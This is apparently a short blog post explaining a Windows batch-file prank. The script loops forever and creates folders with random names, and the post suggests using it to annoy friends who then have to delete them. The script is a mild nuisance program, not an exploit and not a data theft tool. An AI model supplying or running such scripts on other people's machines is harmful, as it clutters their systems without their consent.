You can use this to annoy friends as he'll have to delete them or you can use for your benefit also!
So here it goes....
Open notepad and type :
@echo off
:top
md %random%
goto top
@echo off - makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop
Save it as '' 1000folders.bat '' ( excluding inverted commas )
0 comments:
Post a Comment